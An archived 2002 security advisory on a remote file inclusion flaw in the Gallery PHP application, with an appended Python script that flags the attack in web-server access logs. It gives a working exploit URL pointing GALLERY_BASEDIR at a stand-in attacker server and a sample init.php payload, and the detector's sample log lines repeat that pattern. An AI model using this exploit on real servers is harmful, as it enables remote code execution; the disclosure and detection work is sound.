2nd Aug 2002 [SBWID-5592]
COMMAND
gallery code injection
SYSTEMS AFFECTED
?
PROBLEM
Avart [http://bluephod.net/] says :
There are several include statements that include a variable without
checking it. An administrator of PowerTech (an ISP in Norway) discovered
this problem.
You're able to inject foreign code into the application (if
allow_url_fopen is turned on).
Example code:
errors/configmode.php
[...]
<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>
[...]
# How can I exploit the code?
Use this line:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
On http://your.evil.server.tdl/ you place a file called init.php that
puts out nasty php-code. The file could look like this:
init.php:
<?php
echo "<?php phpinfo(); ?>";
?>
SOLUTION
Check http://gallery.sf.net/ for updates
Get gallery.1.3.1-cvs-b13.tar.gz
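DETECTION (added example, not part of the original advisory or of the Gallery project)
A web-server access log can be checked for requests that set GALLERY_BASEDIR in the query string, which is the request pattern described above. The log format (common/combined), the sample lines and the names scan, LINE, REMOTE and SAMPLE_LOG are assumptions of this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "GALLERY_BASEDIR"  # variable named in the advisory
# Client address and request target from a common/combined-format log line.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with a URL scheme or "//" would send the include off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|//)", re.I)

def scan(log_lines):
    """Return one finding per request whose query string sets GALLERY_BASEDIR."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = LINE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target = match.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes once, as PHP does before filling variables.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key != PARAM:
                continue
            findings.append({
                "line": number,
                "client": client,
                "script": parts.path,
                "value": value,
                # Assumption: the application never puts this variable in a URL
                # itself, so every hit deserves review; remote values are the
                # injection pattern the advisory describes.
                "remote": bool(REMOTE.match(value)),
            })
    return findings

# Constructed sample lines (documentation addresses, reserved example domain).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Aug/2002:10:00:01 +0200] "GET /gallery/albums.php HTTP/1.0" 200 5120',
    '192.0.2.44 - - [02/Aug/2002:10:00:07 +0200] "GET /gallery/captionator.php?GALLERY_BASEDIR=http://remote.example/ HTTP/1.0" 200 812',
    '192.0.2.44 - - [02/Aug/2002:10:00:09 +0200] "GET /gallery/captionator.php?page=2&GALLERY_BASEDIR=http%3A%2F%2Fremote.example%2F HTTP/1.0" 200 812',
    '192.0.2.51 - - [02/Aug/2002:10:01:30 +0200] "GET /gallery/errors/configmode.php?GALLERY_BASEDIR=./ HTTP/1.0" 200 640',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        kind = "REMOTE" if f["remote"] else "local"
        print(f'{f["line"]:>3} {f["client"]} {f["script"]} {kind} {f["value"]}')
```

Values sent in a POST body or a cookie do not appear in an access log, so a clean result here covers the query string only.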